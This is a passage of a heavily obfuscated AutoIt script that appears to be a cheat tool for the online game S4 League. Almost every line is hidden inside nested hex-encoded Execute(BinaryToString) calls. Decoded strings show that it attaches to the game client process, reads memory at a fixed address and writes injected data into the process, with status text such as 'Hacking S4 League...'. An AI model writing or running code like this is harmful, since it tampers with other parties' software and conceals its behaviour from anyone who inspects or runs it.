  2015. $HSYSTEMTIME=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4C313231313931303232313135283229292622782226636872285F4B3837313431323736313136283629292622302226636872285F5536393133313531373131372831372929262234362226636872285F49313036313737383331313428332929262235333739373337343635364435343639364436353230324232303331222929"))
  2016. ELSE
  2017. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F47313432313338303531313928313529292622782226636872285F443136373133353634313138283429292622463338332226636872285F51313238313031303538313230283829292622343434352226636872285F5631323031393133303131323128313129292622343333364334353431343532383239222929"))
  2018. EXIT
  2019. ENDIF
  2020. ENDFUNC
  2021. FUNC _80DET3LEAE()
  2022. #Region ### START Koda GUI section ### Form=
  2023. $FORM1=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F52393535313637363132342836292926222226636872285F42313234313431343235313233283529292622302226636872285F50313430313331313634313232283134292926222226636872285F4F31313834313930373132352837292926223535343934333732363536313734363532383232343636463732364433313232324332303335333033313243323033313339333632433230333133393332324332303331333233343239222929"))
  2024. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F423130343130393930313237283130292926222226636872285F5A31323434313234393132382839292926223437352226636872285F5431373735373632313236283229292622343935333635372226636872285F43313037373134383531323928352929262234323642343336463643364637323238333037383436343634363436343634363239222929"))
  2025. $PIC1=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F5937383731393830313332283230292926222226636872285F5137383732323233313333283133292926223230342226636872285F4E313436393137343931333128392929262235353439343337342226636872285F4F313636313431343939313330283929292622323643343337323635363137343635353036393633323834303534363536443730343436393732323032363230323236343635373337353245363736393636323232433230333032433230333032433230333133363331324332303331333933333239222929"))
  2026. $L51231231=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E67282230782226636872285F4F313639313232313839313336283139292926222226636872285F4E3738313432343435313337283135292926223437352226636872285F4438313531393430313335283230292926223439342226636872285F53393534313730393133342831392929262237343732364334333732363536313734363534433631363236353643323832323533373436353631364336393645363732303534373236393631364332303434363537343635363337343635373432323243323033323332333432433230333333323243323033313338333432433230333233343239222929"))
  2027. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F503135353131313438303133392831302929262278343735352226636872285F4F31323231343139393631343128313629292622392226636872285F4C31333131303137343131343028312929262233373437322226636872285F4C3133363031323438313338283829292622433533363537343436364636453734323832443331324332303331333232433230333833303330324332303330324332303232344435333230353336313645373332303533363537323639363632323239222929"))
  2028. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F513835313931313235313433283135292926223437352226636872285F5131313539383839313432283139292926223439343337342226636872285F51313432313231363335313435283135292926223236433533362226636872285F443131323139313337323134342831322929262237343433364636433646373232383244333132433230333037383436343633303330333033303239222929"))
  2029. $LA123L2=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4C313633313232343134313439283134292926227832302226636872285F41313838343136383531343628352929262237352226636872285F42313639313132313633313438283329292622343934332226636872285F433137323931393232313437283229292622343732364334333732363536313734363534433631363236353643323832323432363136343643373932303533373437353730363936343230364336353635363336383635373232313231323232433230333233333332324332303331333033343243323033313335333632433230333233303239222929"))
  2030. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F5A313433393132343431353028342929262234372226636872285F4A31333131393134383331353128313329292622353439343337342226636872285F453138373431373430313532283130292926222226636872285F51313334373139393631353328362929262236433533363537343436364636453734323832443331324332303331333032433230333833303330324332303330324332303232344435333230353336313645373332303533363537323639363632323239222929"))
  2031. $BUTTON1=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4D3138373531383539313536283139292926222226636872285F4D313234313331333438313534283138292926222226636872285F4131323931313231303931353728392929262230342226636872285F54313830313431363035313535283529292622353534393433373437323643343337323635363137343635343237353734373436463645323832323533364637323732373932323243323033323335333632433230333133353332324332303339333732433230333233353239222929"))
  2032. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E67282230782226636872285F413132393139373237313538283137292926222226636872285F58313433313339373031353928313029292622352226636872285F5531303131313132323531363028352929262234392226636872285F4A3131383132313437383136312838292926223336353734353337343631373436353238343035333537354635333438344635373239222929"))
  2033. #EndRegion ### END Koda GUI section ###
  2034. WHILE 1
  2035. $NMSG=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F5231323131323131303731363428313729292622782226636872285F583130353139363130313632283130292926222226636872285F483937313238363831363328313829292622343735352226636872285F5031333437313336333136352833292926223934373635373434443733363732383239222929"))
  2036. SWITCH $NMSG
  2037. CASE $GUI_EVENT_CLOSE
  2038. EXIT
  2039. ENDSWITCH
  2040. WEND
  2041. EXIT
  2042. ENDFUNC
  2043. FUNC _76CAS4H5AF()
  2044. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F43313231353132343131363628313129292622782226636872285F483135333134313939343136392834292926223735352226636872285F4131353731373134393131363728312929262239343337343732362226636872285F413134353134313734313136382831292926223533363537343434363137343631323832343638344336313632363536433243323032323438363136333642363936453637323035333334323034433635363136373735363532453245324532323239222929"))
  2045. LOCAL $PID=PROCESSWAIT("S"&CHR(_P76171546171(6))&""&CHR(_W6851311170(1))&""&CHR(_D92161780172(10))&"ient.ex"&CHR(_T15462039173(9))&""),$HPROC,$READ=FALSE ,$TIMER=TIMERINIT(),$BUFFER=DLLSTRUCTCREATE("float"),$B=0
  2046. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4D313637313131303032313735283132292926222226636872285F4B3131323132313532373137372837292926222226636872285F4B37383131373636313734283136292926224634373635372226636872285F50313533313331323636313736283136292926223434363536323735363735303732363937363639364336353637363535323734364332383239222929"))
  2047. DO
  2048. $HPROC=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F59363734313438363138302836292926222226636872285F473132343431323434313739283429292622322226636872285F5731333437313731383138312838292926222226636872285F4636383134313030343137382834292926224635303732364636333635373337333446373036353645323832343530343934343243323033303738333033303330333033303432333333393239222929"))
  2049. IF $B=_PROCESSMEMORYREAD($HPROC,16120904,DLLSTRUCTGETPTR($BUFFER,1),4)=450 THEN
  2050. $READ=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F55313035313339343531383428352929262278322226636872285F47313634313336393831383328313829292622353437322226636872285F443638373437313138322831292926222226636872285F4B3735313731313839313835283139292926223635222929"))
  2051. EXITLOOP
  2052. ENDIF
  2053. UNTIL TIMERDIFF($TIMER)>2500
  2054. IF $READ=FALSE THEN
  2055. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F433939313131343930313837283230292926222226636872285F48313139313831323431313836283129292622342226636872285F5031333831323139383331383928313329292622373336373432364637382226636872285F573933353137343031383828313029292622383331333632433230323234353732373236463732323232433230323234453646323036313633363336353733373332303646373232303533333432303735373036343631373436353634324532323239222929"))
  2056. EXIT
  2057. ENDIF
  2058. IF BITAND(GUICTRLREAD($HCB_ARCADE),1)THEN
  2059. $PTEMP=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F5438313631333230313930283230292926222226636872285F513135343137313832343139322831342929262230354635302226636872285F4B31323831333135363531393128313529292622322226636872285F5131383931373230383731393328372929262246363336353733373334443635364436463732373934313643364336463633323832343638353037323646363332433230333433303339333632433230333037383331333033303330324332303330373833343239222929"))
  2060. $STTEMP=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F5A39353931323039313935283929292622322226636872285F43313836313731343332313936283132292926223434362226636872285F5931323631343935313139342831312929262236433533373437323735363337343433373236352226636872285F533834313731363936313937283136292926223137343635323832323737363336383631373235423334354432323239222929"))
  2061. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F41313930313931373437323031283137292926222226636872285F513134393731303232313938283229292622342226636872285F58313435343134393432303028313429292622362226636872285F58393937313236393139392839292926223643353337343732373536333734353336353734343436313734363132383234373337343534363536443730324332303331324332303232353434353533353432323239222929"))
  2062. $TESTWRITE=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F5131313031343234343132303328312929262232302226636872285F4E383839323230303230322831302929262246352226636872285F45313031313332363934323034283429292622373236462226636872285F4431373839323934323230352832292926223336353733373334443635364436463732373935373732363937343635323832343638353037323646363332433230323437303534363536443730324332303434364336433533373437323735363337343437363537343530373437323238323437333734353436353644373032393243323034343643364335333734373237353633373434373635373435333639374136353238323437333734353436353644373032393239222929"))
  2063. ENDIF
  2064. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F55313834313931373435323039283529292622782226636872285F5531333631333130303132303628313129292622372226636872285F4631313339313236353230372835292926223534393433373437322226636872285F4A3130343031353037323038283729292622433533363537343434363137343631323832343638344336313632363536433243323032323436363936453639373336383635363432323239222929"))
  2065. EXIT NOT SLEEP(500)
  2066. ENDFUNC
  2067. FUNC _M157114880($174Z180590)
  2068. $174Z180590=EXECUTE(BINARYTOSTRING("0x243137345A3138303539302B34"))
  2069. $174Z180590=EXECUTE(BINARYTOSTRING("0x243137345A3138303539302B3130"))
  2070. $174Z180590=EXECUTE(BINARYTOSTRING("0x243137345A3138303539302B3230"))
  2071. $174Z180590=EXECUTE(BINARYTOSTRING("0x426974416E6428243137345A3138303539302C313529"))
  2072. $174Z180590=EXECUTE(BINARYTOSTRING("0x426974416E6428243137345A3138303539302C313229"))
  2073. $174Z180590=EXECUTE(BINARYTOSTRING("0x243137345A3138303539302B3434"))
  2074. RETURN $174Z180590
  2075. ENDFUNC
  2076. FUNC _C165117121($126O112701)
  2077. $126O112701=EXECUTE(BINARYTOSTRING("0x243132364F3131323730312B34"))
  2078. $126O112701=EXECUTE(BINARYTOSTRING("0x243132364F3131323730312B3130"))
  2079. $126O112701=EXECUTE(BINARYTOSTRING("0x243132364F3131323730312B3230"))
  2080. $126O112701=EXECUTE(BINARYTOSTRING("0x426974416E6428243132364F3131323730312C313529"))
  2081. $126O112701=EXECUTE(BINARYTOSTRING("0x426974416E6428243132364F3131323730312C313229"))
  2082. $126O112701=EXECUTE(BINARYTOSTRING("0x243132364F3131323730312B3336"))
  2083. RETURN $126O112701
  2084. ENDFUNC
  2085. FUNC _D147159422($147O85182)
  2086. $147O85182=EXECUTE(BINARYTOSTRING("0x426974584F7228243134374F38353138322C313029"))
  2087. $147O85182=EXECUTE(BINARYTOSTRING("0x243134374F38353138322D3132"))
  2088. $147O85182=EXECUTE(BINARYTOSTRING("0x243134374F38353138322D32"))
  2089. $147O85182=EXECUTE(BINARYTOSTRING("0x243134374F38353138322B313236"))
  2090. RETURN $147O85182
  2091. ENDFUNC
  2092. FUNC _O96911643($113Y269293)
  2093. $113Y269293=EXECUTE(BINARYTOSTRING("0x426974416E642824313133593236393239332C323029"))
  2094. $113Y269293=EXECUTE(BINARYTOSTRING("0x24313133593236393239332B3137"))
  2095. $113Y269293=EXECUTE(BINARYTOSTRING("0x24313133593236393239332B3330"))
  2096. RETURN $113Y269293
  2097. ENDFUNC
  2098. FUNC _R180615784($175F109104)
  2099. $175F109104=EXECUTE(BINARYTOSTRING("0x24313735463130393130342B31"))
  2100. $175F109104=EXECUTE(BINARYTOSTRING("0x426974584F722824313735463130393130342C313029"))
  2101. $175F109104=EXECUTE(BINARYTOSTRING("0x24313735463130393130342B3935"))
  2102. RETURN $175F109104
  2103. ENDFUNC
  2104. FUNC _D711718025($128R196305)
  2105. $128R196305=EXECUTE(BINARYTOSTRING("0x426974416E642824313238523139363330352C313829"))
  2106. $128R196305=EXECUTE(BINARYTOSTRING("0x426974416E642824313238523139363330352C313029"))
  2107. $128R196305=EXECUTE(BINARYTOSTRING("0x426974584F722824313238523139363330352C3829"))
  2108. $128R196305=EXECUTE(BINARYTOSTRING("0x24313238523139363330352B3338"))
  2109. RETURN $128R196305
  2110. ENDFUNC
  2111. FUNC _T163920266($82D96346)
  2112. $82D96346=EXECUTE(BINARYTOSTRING("0x426974416E64282438324439363334362C323029"))
  2113. $82D96346=EXECUTE(BINARYTOSTRING("0x2438324439363334362B3137"))
  2114. $82D96346=EXECUTE(BINARYTOSTRING("0x2438324439363334362B3239"))
  2115. RETURN $82D96346
  2116. ENDFUNC
  2117. FUNC _C149422487($78E4487)
  2118. $78E4487=EXECUTE(BINARYTOSTRING("0x426974416E642824373845343438372C3229"))
  2119. $78E4487=EXECUTE(BINARYTOSTRING("0x426974416E642824373845343438372C3529"))
  2120. $78E4487=EXECUTE(BINARYTOSTRING("0x426974584F722824373845343438372C313529"))
  2121. $78E4487=EXECUTE(BINARYTOSTRING("0x24373845343438372D39"))
  2122. $78E4487=EXECUTE(BINARYTOSTRING("0x24373845343438372D35"))
  2123. $78E4487=EXECUTE(BINARYTOSTRING("0x426974416E642824373845343438372C313229"))
  2124. $78E4487=EXECUTE(BINARYTOSTRING("0x426974584F722824373845343438372C3529"))
  2125. $78E4487=EXECUTE(BINARYTOSTRING("0x426974416E642824373845343438372C313929"))
  2126. $78E4487=EXECUTE(BINARYTOSTRING("0x24373845343438372B3437"))
  2127. RETURN $78E4487
  2128. ENDFUNC
  2129. FUNC _G981413748($171N305958)
  2130. $171N305958=EXECUTE(BINARYTOSTRING("0x426974416E6428243137314E3330353935382C313329"))
  2131. $171N305958=EXECUTE(BINARYTOSTRING("0x243137314E3330353935382B35"))
  2132. $171N305958=EXECUTE(BINARYTOSTRING("0x426974416E6428243137314E3330353935382C313229"))
  2133. $171N305958=EXECUTE(BINARYTOSTRING("0x426974416E6428243137314E3330353935382C313529"))
  2134. $171N305958=EXECUTE(BINARYTOSTRING("0x243137314E3330353935382B3137"))
  2135. $171N305958=EXECUTE(BINARYTOSTRING("0x426974584F7228243137314E3330353935382C323029"))
  2136. $171N305958=EXECUTE(BINARYTOSTRING("0x243137314E3330353935382B3437"))
  2137. RETURN $171N305958
  2138. ENDFUNC
  2139. FUNC _J157516099($121F233979)
  2140. $121F233979=EXECUTE(BINARYTOSTRING("0x426974416E642824313231463233333937392C3729"))
  2141. $121F233979=EXECUTE(BINARYTOSTRING("0x24313231463233333937392B35"))
  2142. $121F233979=EXECUTE(BINARYTOSTRING("0x24313231463233333937392B3138"))
  2143. $121F233979=EXECUTE(BINARYTOSTRING("0x426974584F722824313231463233333937392C313929"))
  2144. $121F233979=EXECUTE(BINARYTOSTRING("0x24313231463233333937392D3133"))
  2145. $121F233979=EXECUTE(BINARYTOSTRING("0x426974416E642824313231463233333937392C3329"))
  2146. $121F233979=EXECUTE(BINARYTOSTRING("0x426974416E642824313231463233333937392C3129"))
  2147. $121F233979=EXECUTE(BINARYTOSTRING("0x24313231463233333937392D39"))
  2148. $121F233979=EXECUTE(BINARYTOSTRING("0x24313231463233333937392B3537"))
  2149. RETURN $121F233979
  2150. ENDFUNC
  2151. FUNC _X1305182010($135M183910)
  2152. $135M183910=EXECUTE(BINARYTOSTRING("0x426974416E6428243133354D3138333931302C3729"))
  2153. $135M183910=EXECUTE(BINARYTOSTRING("0x243133354D3138333931302B35"))
  2154. $135M183910=EXECUTE(BINARYTOSTRING("0x243133354D3138333931302B3138"))
  2155. $135M183910=EXECUTE(BINARYTOSTRING("0x426974584F7228243133354D3138333931302C313929"))
  2156. $135M183910=EXECUTE(BINARYTOSTRING("0x243133354D3138333931302D3133"))
  2157. $135M183910=EXECUTE(BINARYTOSTRING("0x426974416E6428243133354D3138333931302C3329"))
  2158. $135M183910=EXECUTE(BINARYTOSTRING("0x426974416E6428243133354D3138333931302C3129"))
  2159. $135M183910=EXECUTE(BINARYTOSTRING("0x243133354D3138333931302D39"))
  2160. $135M183910=EXECUTE(BINARYTOSTRING("0x243133354D3138333931302B3633"))
  2161. RETURN $135M183910
  2162. ENDFUNC
  2163. FUNC _T747206711($74K861211)
  2164. $74K861211=EXECUTE(BINARYTOSTRING("0x426974584F72282437344B3836313231312C313229"))
  2165. $74K861211=EXECUTE(BINARYTOSTRING("0x426974584F72282437344B3836313231312C3129"))
  2166. $74K861211=EXECUTE(BINARYTOSTRING("0x426974416E64282437344B3836313231312C3129"))
  2167. $74K861211=EXECUTE(BINARYTOSTRING("0x2437344B3836313231312B34"))
  2168. $74K861211=EXECUTE(BINARYTOSTRING("0x2437344B3836313231312B3439"))
  2169. RETURN $74K861211
  2170. ENDFUNC
  2171. FUNC _S11014110412($77Z965412)
  2172. $77Z965412=EXECUTE(BINARYTOSTRING("0x426974416E64282437375A3936353431322C313329"))
  2173. $77Z965412=EXECUTE(BINARYTOSTRING("0x2437375A3936353431322B35"))
  2174. $77Z965412=EXECUTE(BINARYTOSTRING("0x426974416E64282437375A3936353431322C313229"))
  2175. $77Z965412=EXECUTE(BINARYTOSTRING("0x426974416E64282437375A3936353431322C313529"))
  2176. $77Z965412=EXECUTE(BINARYTOSTRING("0x2437375A3936353431322B3137"))
  2177. $77Z965412=EXECUTE(BINARYTOSTRING("0x426974584F72282437375A3936353431322C323029"))
  2178. $77Z965412=EXECUTE(BINARYTOSTRING("0x2437375A3936353431322B313135"))
  2179. RETURN $77Z965412
  2180. ENDFUNC
  2181. FUNC _Q1237135813($111Q891613)
  2182. $111Q891613=EXECUTE(BINARYTOSTRING("0x426974584F722824313131513839313631332C313229"))
  2183. $111Q891613=EXECUTE(BINARYTOSTRING("0x426974584F722824313131513839313631332C3129"))
  2184. $111Q891613=EXECUTE(BINARYTOSTRING("0x426974416E642824313131513839313631332C3129"))
  2185. $111Q891613=EXECUTE(BINARYTOSTRING("0x24313131513839313631332B34"))
  2186. $111Q891613=EXECUTE(BINARYTOSTRING("0x24313131513839313631332B3433"))
  2187. RETURN $111Q891613
  2188. ENDFUNC
  2189. FUNC _N16714159714($81U35114)
  2190. $81U35114=EXECUTE(BINARYTOSTRING("0x426974416E64282438315533353131342C313329"))
  2191. $81U35114=EXECUTE(BINARYTOSTRING("0x2438315533353131342B35"))
  2192. $81U35114=EXECUTE(BINARYTOSTRING("0x426974416E64282438315533353131342C313229"))
  2193. $81U35114=EXECUTE(BINARYTOSTRING("0x426974416E64282438315533353131342C313529"))
  2194. $81U35114=EXECUTE(BINARYTOSTRING("0x2438315533353131342B3137"))
  2195. $81U35114=EXECUTE(BINARYTOSTRING("0x426974584F72282438315533353131342C323029"))
  2196. $81U35114=EXECUTE(BINARYTOSTRING("0x2438315533353131342B3338"))
  2197. RETURN $81U35114
  2198. ENDFUNC
  2199. FUNC _X975183715($80U27415)
  2200. $80U27415=EXECUTE(BINARYTOSTRING("0x426974416E64282438305532373431352C3729"))
  2201. $80U27415=EXECUTE(BINARYTOSTRING("0x2438305532373431352B35"))
  2202. $80U27415=EXECUTE(BINARYTOSTRING("0x2438305532373431352B3138"))
  2203. $80U27415=EXECUTE(BINARYTOSTRING("0x426974584F72282438305532373431352C313929"))
  2204. $80U27415=EXECUTE(BINARYTOSTRING("0x2438305532373431352D3133"))
  2205. $80U27415=EXECUTE(BINARYTOSTRING("0x426974416E64282438305532373431352C3329"))
  2206. $80U27415=EXECUTE(BINARYTOSTRING("0x426974416E64282438305532373431352C3129"))
  2207. $80U27415=EXECUTE(BINARYTOSTRING("0x2438305532373431352D39"))
  2208. $80U27415=EXECUTE(BINARYTOSTRING("0x2438305532373431352B3636"))
  2209. RETURN $80U27415
  2210. ENDFUNC
  2211. FUNC _K729169416($170V2690616)
  2212. $170V2690616=EXECUTE(BINARYTOSTRING("0x426974416E64282431373056323639303631362C323029"))
  2213. $170V2690616=EXECUTE(BINARYTOSTRING("0x2431373056323639303631362B3137"))
  2214. $170V2690616=EXECUTE(BINARYTOSTRING("0x2431373056323639303631362B3332"))
  2215. RETURN $170V2690616
  2216. ENDFUNC
  2217. FUNC _Q18210191117($112Q2428517)
  2218. $112Q2428517=EXECUTE(BINARYTOSTRING("0x426974416E64282431313251323432383531372C3229"))
  2219. $112Q2428517=EXECUTE(BINARYTOSTRING("0x2431313251323432383531372D35"))
  2220. $112Q2428517=EXECUTE(BINARYTOSTRING("0x2431313251323432383531372B3136"))
  2221. $112Q2428517=EXECUTE(BINARYTOSTRING("0x2431313251323432383531372D38"))
  2222. $112Q2428517=EXECUTE(BINARYTOSTRING("0x2431313251323432383531372B33"))
  2223. $112Q2428517=EXECUTE(BINARYTOSTRING("0x2431313251323432383531372D3135"))
  2224. $112Q2428517=EXECUTE(BINARYTOSTRING("0x426974416E64282431313251323432383531372C3729"))
  2225. $112Q2428517=EXECUTE(BINARYTOSTRING("0x2431313251323432383531372B3431"))
  2226. RETURN $112Q2428517
  2227. ENDFUNC
  2228. FUNC _U821215618($169W1592118)
  2229. $169W1592118=EXECUTE(BINARYTOSTRING("0x2431363957313539323131382D3138"))
  2230. $169W1592118=EXECUTE(BINARYTOSTRING("0x2431363957313539323131382D3137"))
  2231. $169W1592118=EXECUTE(BINARYTOSTRING("0x2431363957313539323131382B37"))
  2232. $169W1592118=EXECUTE(BINARYTOSTRING("0x2431363957313539323131382B313332"))
  2233. RETURN $169W1592118
  2234. ENDFUNC
  2235. FUNC _E17117238619($98E51719)
  2236. $98E51719=EXECUTE(BINARYTOSTRING("0x426974416E64282439384535313731392C313829"))
  2237. $98E51719=EXECUTE(BINARYTOSTRING("0x426974416E64282439384535313731392C313029"))
  2238. $98E51719=EXECUTE(BINARYTOSTRING("0x426974584F72282439384535313731392C3829"))
  2239. $98E51719=EXECUTE(BINARYTOSTRING("0x2439384535313731392B3433"))
  2240. RETURN $98E51719
  2241. ENDFUNC
  2242. FUNC _W17612106420($141M917520)
  2243. $141M917520=EXECUTE(BINARYTOSTRING("0x243134314D3931373532302D3137"))
  2244. $141M917520=EXECUTE(BINARYTOSTRING("0x426974416E6428243134314D3931373532302C3529"))
  2245. $141M917520=EXECUTE(BINARYTOSTRING("0x243134314D3931373532302B35"))
  2246. $141M917520=EXECUTE(BINARYTOSTRING("0x243134314D3931373532302B3431"))
  2247. RETURN $141M917520
  2248. ENDFUNC
  2249. FUNC _J16211131121($179Z2966421)
  2250. $179Z2966421=EXECUTE(BINARYTOSTRING("0x243137395A323936363432312B34"))
  2251. $179Z2966421=EXECUTE(BINARYTOSTRING("0x243137395A323936363432312B3130"))
  2252. $179Z2966421=EXECUTE(BINARYTOSTRING("0x243137395A323936363432312B3230"))
  2253. $179Z2966421=EXECUTE(BINARYTOSTRING("0x426974416E6428243137395A323936363432312C313529"))
  2254. $179Z2966421=EXECUTE(BINARYTOSTRING("0x426974416E6428243137395A323936363432312C313229"))
  2255. $179Z2966421=EXECUTE(BINARYTOSTRING("0x243137395A323936363432312B3433"))
  2256. RETURN $179Z2966421
  2257. ENDFUNC
  2258. FUNC _M17612156622($113U781222)
  2259. $113U781222=EXECUTE(BINARYTOSTRING("0x24313133553738313232322D3137"))
  2260. $113U781222=EXECUTE(BINARYTOSTRING("0x426974416E642824313133553738313232322C3529"))
  2261. $113U781222=EXECUTE(BINARYTOSTRING("0x24313133553738313232322B35"))
  2262. $113U781222=EXECUTE(BINARYTOSTRING("0x24313133553738313232322B3432"))
  2263. RETURN $113U781222
  2264. ENDFUNC
  2265. FUNC _H16611180523($134X2302423)
  2266. $134X2302423=EXECUTE(BINARYTOSTRING("0x2431333458323330323432332B34"))
  2267. $134X2302423=EXECUTE(BINARYTOSTRING("0x2431333458323330323432332B3130"))
  2268. $134X2302423=EXECUTE(BINARYTOSTRING("0x2431333458323330323432332B3230"))
  2269. $134X2302423=EXECUTE(BINARYTOSTRING("0x426974416E64282431333458323330323432332C313529"))
  2270. $134X2302423=EXECUTE(BINARYTOSTRING("0x426974416E64282431333458323330323432332C313229"))
  2271. $134X2302423=EXECUTE(BINARYTOSTRING("0x2431333458323330323432332B313136"))
  2272. RETURN $134X2302423
  2273. ENDFUNC
  2274. FUNC _E684139024($79N2233924)
  2275. $79N2233924=EXECUTE(BINARYTOSTRING("0x426974416E64282437394E323233333932342C3229"))
  2276. $79N2233924=EXECUTE(BINARYTOSTRING("0x426974416E64282437394E323233333932342C3529"))
  2277. $79N2233924=EXECUTE(BINARYTOSTRING("0x426974584F72282437394E323233333932342C313529"))
  2278. $79N2233924=EXECUTE(BINARYTOSTRING("0x2437394E323233333932342D39"))
  2279. $79N2233924=EXECUTE(BINARYTOSTRING("0x2437394E323233333932342D35"))
  2280. $79N2233924=EXECUTE(BINARYTOSTRING("0x426974416E64282437394E323233333932342C313229"))
  2281. $79N2233924=EXECUTE(BINARYTOSTRING("0x426974584F72282437394E323233333932342C3529"))
  2282. $79N2233924=EXECUTE(BINARYTOSTRING("0x426974416E64282437394E323233333932342C313929"))
  2283. $79N2233924=EXECUTE(BINARYTOSTRING("0x2437394E323233333932342B3439"))
  2284. RETURN $79N2233924
  2285. ENDFUNC
  2286. FUNC _G12617162725($157C2723425)
  2287. $157C2723425=EXECUTE(BINARYTOSTRING("0x426974416E64282431353743323732333432352C313829"))
  2288. $157C2723425=EXECUTE(BINARYTOSTRING("0x426974416E64282431353743323732333432352C313029"))
  2289. $157C2723425=EXECUTE(BINARYTOSTRING("0x426974584F72282431353743323732333432352C3829"))
  2290. $157C2723425=EXECUTE(BINARYTOSTRING("0x2431353743323732333432352B3434"))
  2291. RETURN $157C2723425
  2292. ENDFUNC
  2293. FUNC _Y1531187526($190M3118126)
  2294. $190M3118126=EXECUTE(BINARYTOSTRING("0x243139304D333131383132362D3138"))
  2295. $190M3118126=EXECUTE(BINARYTOSTRING("0x243139304D333131383132362D3137"))
  2296. $190M3118126=EXECUTE(BINARYTOSTRING("0x243139304D333131383132362B37"))
  2297. $190M3118126=EXECUTE(BINARYTOSTRING("0x243139304D333131383132362B313433"))
  2298. RETURN $190M3118126
  2299. ENDFUNC
  2300. FUNC _W1625210927($169D1402027)
  2301. $169D1402027=EXECUTE(BINARYTOSTRING("0x426974416E64282431363944313430323032372C3729"))
  2302. $169D1402027=EXECUTE(BINARYTOSTRING("0x2431363944313430323032372B35"))
  2303. $169D1402027=EXECUTE(BINARYTOSTRING("0x2431363944313430323032372B3138"))
  2304. $169D1402027=EXECUTE(BINARYTOSTRING("0x426974584F72282431363944313430323032372C313929"))
  2305. $169D1402027=EXECUTE(BINARYTOSTRING("0x2431363944313430323032372D3133"))
  2306. $169D1402027=EXECUTE(BINARYTOSTRING("0x426974416E64282431363944313430323032372C3329"))
  2307. $169D1402027=EXECUTE(BINARYTOSTRING("0x426974416E64282431363944313430323032372C3129"))
  2308. $169D1402027=EXECUTE(BINARYTOSTRING("0x2431363944313430323032372D39"))
  2309. $169D1402027=EXECUTE(BINARYTOSTRING("0x2431363944313430323032372B3537"))
  2310. RETURN $169D1402027
  2311. ENDFUNC
  2312. FUNC _X1145146428($97E172928)
  2313. $97E172928=EXECUTE(BINARYTOSTRING("0x426974416E6428243937453137323932382C3729"))
  2314. $97E172928=EXECUTE(BINARYTOSTRING("0x243937453137323932382B35"))
  2315. $97E172928=EXECUTE(BINARYTOSTRING("0x243937453137323932382B3138"))
  2316. $97E172928=EXECUTE(BINARYTOSTRING("0x426974584F7228243937453137323932382C313929"))
  2317. $97E172928=EXECUTE(BINARYTOSTRING("0x243937453137323932382D3133"))
  2318. $97E172928=EXECUTE(BINARYTOSTRING("0x426974416E6428243937453137323932382C3329"))
  2319. $97E172928=EXECUTE(BINARYTOSTRING("0x426974416E6428243937453137323932382C3129"))
  2320. $97E172928=EXECUTE(BINARYTOSTRING("0x243937453137323932382D39"))
  2321. $97E172928=EXECUTE(BINARYTOSTRING("0x243937453137323932382B3635"))
  2322. RETURN $97E172928
  2323. ENDFUNC
  2324. FUNC _P705170029($162A733229)
  2325. $162A733229=EXECUTE(BINARYTOSTRING("0x426974416E642824313632413733333232392C3729"))
  2326. $162A733229=EXECUTE(BINARYTOSTRING("0x24313632413733333232392B35"))
  2327. $162A733229=EXECUTE(BINARYTOSTRING("0x24313632413733333232392B3138"))
  2328. $162A733229=EXECUTE(BINARYTOSTRING("0x426974584F722824313632413733333232392C313929"))
  2329. $162A733229=EXECUTE(BINARYTOSTRING("0x24313632413733333232392D3133"))
  2330. $162A733229=EXECUTE(BINARYTOSTRING("0x426974416E642824313632413733333232392C3329"))
  2331. $162A733229=EXECUTE(BINARYTOSTRING("0x426974416E642824313632413733333232392C3129"))
  2332. $162A733229=EXECUTE(BINARYTOSTRING("0x24313632413733333232392D39"))
  2333. $162A733229=EXECUTE(BINARYTOSTRING("0x24313632413733333232392B3538"))
  2334. RETURN $162A733229
  2335. ENDFUNC
  2336. FUNC _A11110193130($131Z2467530)
  2337. $131Z2467530=EXECUTE(BINARYTOSTRING("0x426974416E6428243133315A323436373533302C3229"))
  2338. $131Z2467530=EXECUTE(BINARYTOSTRING("0x243133315A323436373533302D35"))
  2339. $131Z2467530=EXECUTE(BINARYTOSTRING("0x243133315A323436373533302B3136"))
  2340. $131Z2467530=EXECUTE(BINARYTOSTRING("0x243133315A323436373533302D38"))
  2341. $131Z2467530=EXECUTE(BINARYTOSTRING("0x243133315A323436373533302B33"))
  2342. $131Z2467530=EXECUTE(BINARYTOSTRING("0x243133315A323436373533302D3135"))
  2343. $131Z2467530=EXECUTE(BINARYTOSTRING("0x426974416E6428243133315A323436373533302C3729"))
  2344. $131Z2467530=EXECUTE(BINARYTOSTRING("0x243133315A323436373533302B3433"))
  2345. RETURN $131Z2467530
  2346. ENDFUNC
  2347. FUNC _H13814217131($112O312031)
  2348. $112O312031=EXECUTE(BINARYTOSTRING("0x426974416E6428243131324F3331323033312C313329"))
  2349. $112O312031=EXECUTE(BINARYTOSTRING("0x243131324F3331323033312B35"))
